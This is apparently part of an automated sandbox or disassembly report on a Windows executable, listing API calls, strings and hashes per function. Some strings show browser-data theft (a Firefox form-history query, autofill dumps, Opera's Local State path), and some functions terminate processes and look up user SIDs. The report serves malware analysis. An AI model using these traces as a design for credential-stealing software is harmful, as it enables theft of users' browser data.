                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ct_init: 256+dist != 512$ct_init: dist != 256$ct_init: length != 256
                                                                                                                                            • API String ID: 0-2704465662
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00425FF2: _memset.LIBCMT ref: 00426000
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E762
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E788
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E7C8
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042E813
                                                                                                                                            • __allrem.LIBCMT ref: 0042E81D
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042E83D
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042E8A1
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042E8C2
                                                                                                                                            • __allrem.LIBCMT ref: 0042E8CC
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E8EF
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E90B
                                                                                                                                            • __fprintf_l.LIBCMT ref: 0042E944
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fprintf_l$Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$_memset
                                                                                                                                            • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld
                                                                                                                                            • API String ID: 2116274655-866662573
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset_sprintflstrcat
                                                                                                                                            • String ID: %s%s$Autofill\%s_%s.txt$SELECT fieldname, value FROM moz_formhistory$\temp
                                                                                                                                            • API String ID: 2288810340-1758122038
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fprintf_l
                                                                                                                                            • String ID: %!.15g$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                                            • API String ID: 3906573944-2866863630
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __wgetenv.LIBCMT ref: 0040C568
                                                                                                                                            • LoadLibraryA.KERNEL32(73BB81D0,?,0040C728), ref: 0040C5A5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040C5C1
                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040C5D4
                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040C5E7
                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040C5FA
                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040C60D
                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040C620
                                                                                                                                              • Part of subcall function 00466D8B: __lock.LIBCMT ref: 00466D99
                                                                                                                                              • Part of subcall function 00466D8B: __putenv_helper.LIBCMT ref: 00466DA8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$LibraryLoad__lock__putenv_helper__wgetenv
                                                                                                                                            • String ID: PATH$PATH=
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00420E26: _memset.LIBCMT ref: 00420E45
                                                                                                                                            • _memset.LIBCMT ref: 00452361
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID: 2$cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove$_memset
                                                                                                                                            • String ID: -journal$-wal$immutable$nolock
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00410601
                                                                                                                                            • _memset.LIBCMT ref: 0041062B
                                                                                                                                              • Part of subcall function 0045D0A6: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,0040C6DE,?,0000001A), ref: 0045D0C0
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,0000001A,?,?,00000014), ref: 0041064C
                                                                                                                                            • _memset.LIBCMT ref: 00410657
                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 0041066A
                                                                                                                                            • lstrcatA.KERNEL32(?,\Opera Stable\Local State,?,?,?,?,?,00000014), ref: 00410678
                                                                                                                                            Strings
                                                                                                                                            • \Opera Stable\Local State, xrefs: 0041066C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcat$_memset$FolderH_prolog3Path
                                                                                                                                            • String ID: \Opera Stable\Local State
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • cannot detach database %s, xrefs: 004460BA
                                                                                                                                            • cannot DETACH database within transaction, xrefs: 004460C7
                                                                                                                                            • no such database: %s, xrefs: 004460AB
                                                                                                                                            • database %s is locked, xrefs: 00446107
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fprintf_l
                                                                                                                                            • String ID: cannot DETACH database within transaction$cannot detach database %s$database %s is locked$no such database: %s
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0045C1EC
                                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0045C204
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0045C219
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0045C229
                                                                                                                                            • ReleaseDC.USER32 ref: 0045C234
                                                                                                                                              • Part of subcall function 0045EF7B: __EH_prolog3_GS.LIBCMT ref: 0045EF85
                                                                                                                                              • Part of subcall function 004025E8: _memmove.LIBCMT ref: 00402607
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDeviceH_prolog3_$CreateRelease_memmove
                                                                                                                                            • String ID: DISPLAY
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 0046A0F9
                                                                                                                                              • Part of subcall function 00464EFC: __getptd.LIBCMT ref: 00464F0A
                                                                                                                                              • Part of subcall function 00464EFC: __getptd.LIBCMT ref: 00464F18
                                                                                                                                            • __getptd.LIBCMT ref: 0046A103
                                                                                                                                              • Part of subcall function 0046D13D: __getptd_noexit.LIBCMT ref: 0046D140
                                                                                                                                              • Part of subcall function 0046D13D: __amsg_exit.LIBCMT ref: 0046D14D
                                                                                                                                            • __getptd.LIBCMT ref: 0046A111
                                                                                                                                            • __getptd.LIBCMT ref: 0046A11F
                                                                                                                                            • __getptd.LIBCMT ref: 0046A12A
                                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 0046A150
                                                                                                                                              • Part of subcall function 00464FA1: __CallSettingFrame@12.LIBCMT ref: 00464FED
                                                                                                                                              • Part of subcall function 0046A1F7: __getptd.LIBCMT ref: 0046A206
                                                                                                                                              • Part of subcall function 0046A1F7: __getptd.LIBCMT ref: 0046A214
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                            • String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __fprintf_l
                                                                                                                                            • String ID: %!.15g$%!.20e$NULL
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm$__aullrem
                                                                                                                                            • String ID: -x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                            • API String ID: 643879872-3011028180
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove
                                                                                                                                            • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                            • API String ID: 4104443479-3170954634
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0040E5EE
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000012,0000005C,0040FCA4,00000001,?,00000104,0000002C), ref: 0040E687
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040E68E
                                                                                                                                            • _strcpy_s.LIBCMT ref: 0040E6D9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$AllocH_prolog3_Process_strcpy_s
                                                                                                                                            • String ID: 0123456789ABCDEF
                                                                                                                                            • API String ID: 794038625-2554083253
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 0046A491
                                                                                                                                              • Part of subcall function 0046A3EC: ___BuildCatchObjectHelper.LIBCMT ref: 0046A422
                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0046A4A8
                                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 0046A4B6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4048096073-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: P$P$t
                                                                                                                                            • API String ID: 0-459111052
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memset
                                                                                                                                            • String ID: %s-shm$winOpenShm$B
                                                                                                                                            • API String ID: 2102423945-2110620802
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0045C2ED
                                                                                                                                            • _memset.LIBCMT ref: 0045C31C
                                                                                                                                            • GetUserDefaultLocaleName.KERNEL32(?,00000055,?,?,00000008), ref: 0045C32A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DefaultH_prolog3LocaleNameUser_memset
                                                                                                                                            • String ID: Unknown
                                                                                                                                            • API String ID: 1926270201-1654365787
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _memmove$_memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1357608183-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00468277
                                                                                                                                              • Part of subcall function 0046598C: __getptd.LIBCMT ref: 0046599F
                                                                                                                                              • Part of subcall function 0046AAAD: __getptd_noexit.LIBCMT ref: 0046AAAD
                                                                                                                                            • __stricmp_l.LIBCMT ref: 004682E4
                                                                                                                                              • Part of subcall function 00465A4C: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00465A5B
                                                                                                                                            • ___crtLCMapStringA.LIBCMT ref: 0046833A
                                                                                                                                            • ___crtLCMapStringA.LIBCMT ref: 004683BB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2544346105-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00404452
                                                                                                                                            • _strtok.LIBCMT ref: 00404466
                                                                                                                                              • Part of subcall function 0046577D: __getptd.LIBCMT ref: 0046579B
                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,00481844,00000001,00000000,?,?,?,?,?,?,00000024), ref: 004044A4
                                                                                                                                            • _strtok.LIBCMT ref: 004044AF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strtok$CreateDirectoryH_prolog3___getptd
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2807274917-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040C26E: _malloc.LIBCMT ref: 0040C29B
                                                                                                                                              • Part of subcall function 0040C26E: CreateToolhelp32Snapshot.KERNEL32 ref: 0040C2AE
                                                                                                                                              • Part of subcall function 0040C26E: CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 0040C2BB
                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?), ref: 0040C381
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 0040C391
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0040C398
                                                                                                                                            • _free.LIBCMT ref: 0040C3A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleProcess$CreateOpenSnapshotTerminateToolhelp32_free_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 486718275-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004027D3
                                                                                                                                              • Part of subcall function 0046336A: std::exception::exception.LIBCMT ref: 0046337F
                                                                                                                                              • Part of subcall function 0046336A: __CxxThrowException@8.LIBCMT ref: 00463394
                                                                                                                                              • Part of subcall function 0046336A: std::exception::exception.LIBCMT ref: 004633A5
                                                                                                                                            • _memmove.LIBCMT ref: 0040280E
                                                                                                                                            Strings
                                                                                                                                            • invalid string position, xrefs: 004027CE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                            • String ID: invalid string position
                                                                                                                                            • API String ID: 1785806476-1799206989
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040C0F7
                                                                                                                                              • Part of subcall function 0046647E: __fsopen.LIBCMT ref: 0046648B
                                                                                                                                            • _fprintf.LIBCMT ref: 0040C0C2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteFile__fsopen_fprintf
                                                                                                                                            • String ID: %s
                                                                                                                                            • API String ID: 634087206-620797490
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00464F4F: __getptd.LIBCMT ref: 00464F55
                                                                                                                                              • Part of subcall function 00464F4F: __getptd.LIBCMT ref: 00464F65
                                                                                                                                            • __getptd.LIBCMT ref: 0046A206
                                                                                                                                              • Part of subcall function 0046D13D: __getptd_noexit.LIBCMT ref: 0046D140
                                                                                                                                              • Part of subcall function 0046D13D: __amsg_exit.LIBCMT ref: 0046D14D
                                                                                                                                            • __getptd.LIBCMT ref: 0046A214
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 803148776-1018135373
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • std::exception::exception.LIBCMT ref: 00402701
                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00402716
                                                                                                                                              • Part of subcall function 00464B51: _malloc.LIBCMT ref: 00464B6B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                            • String ID: P&@
                                                                                                                                            • API String ID: 4063778783-654259478
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Executed Functions

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00411080,?,?,?,?,?,00412132), ref: 004110A3
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00411080,?,?,?,?,?,00412132), ref: 004110AA
                                                                                                                                            • ExitProcess.KERNEL32 ref: 004110BC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 00401C4A
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00401C5F
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401C62
                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 00401C70
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401C93
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00401C9E
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401CA1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00401CB1
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401CDE
                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401CF1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401D82
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D8B
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D90
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D93
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D9A
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D9D
                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00401DA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3326663573-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3907804496
                                                                                                                                            • Opcode ID: fd12fb66ee6723847a94f6c31c07f5551fb915ac6191bc8621f9585a19dfb3a8
                                                                                                                                            • Instruction ID: 68eb4cd5866e5da1edd4d9018ae4073d6158bda8aeb178e670a8a67cab436560
                                                                                                                                            • Opcode Fuzzy Hash: fd12fb66ee6723847a94f6c31c07f5551fb915ac6191bc8621f9585a19dfb3a8
                                                                                                                                            • Instruction Fuzzy Hash: 2DC104B0A042459FCF15DF99C890BEEBBB4AF49304F04416EE905A7392C7789D86CB6D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041C770: CreateFileW.KERNELBASE(00000000,00000000,?,0041CB60,?,?,00000000,?,0041CB60,00000000,0000000C), ref: 0041C78D
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CBCB
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CBD2
                                                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 0041CBDE
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CBE8
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CBF1
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041CC11
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041CD5E
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CD90
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CD97
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4237864984-0
                                                                                                                                            • Opcode ID: 7d100adb8ef57272e29c30100c41ee3dcb7b23529d4f1c6e2bc366b466240ade
                                                                                                                                            • Instruction ID: 9a888166caf7c729a04a6387afd24b78d2efbf651294ef369ed2e80490bd9623
                                                                                                                                            • Opcode Fuzzy Hash: 7d100adb8ef57272e29c30100c41ee3dcb7b23529d4f1c6e2bc366b466240ade
                                                                                                                                            • Instruction Fuzzy Hash: 13A14832A441448FCF29DF68DC91BEE3BB1AB06324F14016EE815EB391D7389C96CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
